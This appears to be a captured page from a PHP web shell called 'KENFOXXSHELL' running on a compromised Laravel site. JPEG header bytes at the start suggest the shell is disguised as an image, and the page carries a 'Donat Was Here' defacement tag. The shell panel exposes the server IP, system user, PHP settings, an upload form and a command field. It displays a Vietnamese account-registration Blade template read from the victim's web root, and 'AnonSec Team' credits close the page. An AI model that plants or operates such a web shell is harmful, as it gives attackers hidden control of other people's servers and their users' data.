JFIFHHC     C  " 5????! ??? Donat Was Here
KENFOXXSHELL
Server IP : 160.25.81.117  /  Your IP : 216.73.216.137
Web Server : Apache/2
System : Linux sv05.hilab.cloud 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : bellizen ( 1045)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/bellizen/domains/bellizeno.com/public_html/resources/views/templates/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/bellizen/domains/bellizeno.com/public_html/resources/views/templates//dangky_tpl.blade.php
@extends('index')
@section('content')
<section class="login-page">

    <section class="login-content">

        <div class="container">

            <div class="row">

                <div class="col-md-4 offset-md-4">

                    <form class="login-form" name="frm_contact" method="post" action="{!! url('dang-ky') !!}">
                        <input type="hidden" name="_token" value="{!! csrf_token() !!}" />

                        <h4>Đăng ký tài khoản</h4>
                        
                        @if (count($errors) > 0)
                            @foreach ($errors->all() as $error)
                            <div class="alert alert-info">{!! $error !!}</div>
                            @endforeach
                        @else
                            @if(session('thongbao'))
                                <div class="alert alert-info">{{session('thongbao')}}</div>
                            @endif
                        @endif
                        <input type="text" class="username" required placeholder="Username" name="username">
                        <input type="text" class="name" required placeholder="Họ và tên" name="name">
                        <input type="text" class="username" required placeholder="Địa chỉ" name="address">

                        <input type="email" class="username" required placeholder="Email đăng nhập" name="email">

                        <input type="text" class="username" required placeholder="SDT đăng ký" name="phone">

                        <div class="form-group input-group">

                            <input type="password" id="password" name="password" class="form-control" required

                                   placeholder="Mật khẩu" autocomplete="off"/>

                            <label class="input-group-addon">

                                <input type="checkbox" style="display:none" onclick="(function(e, el){

                              document.getElementById('password').type = el.checked ? 'text' : 'password';

                              })(event, this)">

                                <span class="i-abs"><i class="fa fa-eye" aria-hidden="true"></i></span>

                            </label>

                        </div>

                        <div class="form-group input-group">

                            <input type="password" id="re-password" name="re-password" class="form-control" required placeholder="Nhập lại mật khẩu" autocomplete="off"/>

                            <label class="input-group-addon">

                                <input type="checkbox" style="display:none" onclick="(function(e, el){

                              document.getElementById('re-password').type = el.checked ? 'text' : 'password';

                              })(event, this)">

                                <span class="i-abs"><i class="fa fa-eye" aria-hidden="true"></i></span>

                            </label>

                        </div>

                        <button name="btnlog" type="submit">Đăng ký</button>

                    </form>

                </div>

            </div>

        </div>

    </section>

</section>

@endsection

Anon7 - 2022
AnonSec Team